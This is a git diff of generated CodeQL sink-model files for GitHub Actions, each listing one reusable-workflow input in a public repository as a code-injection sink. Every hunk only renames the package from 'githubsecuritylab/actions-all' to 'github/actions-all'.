a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 3d1e182458e..4747cd57c4d 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 689cc91871a..3b68ca76fe2 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index 0481c04cb67..62b99c23ff6 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 8c0c944a393..84347b6cbfa 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 8f4c4432408..32a3d5061e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 9406f7d299c..d4ffc373678 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 36838ef4ddb..5a5d3999ca7 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index 8b16601e6c2..9983ea4eee2 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index e8db2ff568d..e8acf5f2c3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index 208e444adeb..bd7494ab69a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 41edf0b0373..89b60a4ac84 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index faca7973f1f..7c72cb57dca 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index 76db6821c5e..2e9681cb21e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 383a88ed055..d30f1bb7bba 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index bcd3b09ed68..85771a98962 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 53e16f8771a..194ac90b648 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index 4310e028de1..d013a9c1b8f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 84d2f57a3fb..57d88f54186 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 7debf6960ed..312d9e193e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index 640180b870a..b62903a97e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index 7ea3039b552..e983a4a6c98 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index ced66aee32f..4a45392e15d 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index e63440d1fca..ac20cdeeb3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index f7021148c51..f6876b3bc56 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 8345368057c..9785efe9637 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 3754ebfa63d..3197652aadc 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index 3e35747b558..f0ebfa17724 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index a13f6863caa..74afc5c0cc5 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index af5c300ea8b..fa145f6b625 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index 449ea8b7b49..ab486b47df2 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 6656d42c4e6..dc402bc1e45 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index 6e7fdc34a54..b5d4d6e4bde 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 8fc02a27e1c..83b45112b86 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 80f19676b4a..c40044c852e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 56b2ef6691e..01178790847 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 7bc952a8483..9593323f325 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 1c0663dd01c..7901da27836 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index 4da8f327662..ccb1bd24654 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 4e8adfafe3c..8317fdabab0 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 28cb702ce13..529e1576e74 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index cb315ee4328..d659fbc8089 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 956c4cba966..9ca03d9aee1 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index 804c1bdae4e..725487f1005 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index 78d91b2afb5..2bda8bb60a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index 31cadc3ff17..e91b615cbe6 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index 11362fda1e5..e09e461e605 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index 131cff3e92a..f8dd54aee14 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index acc5bf51e35..c4aaa28f00b 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml 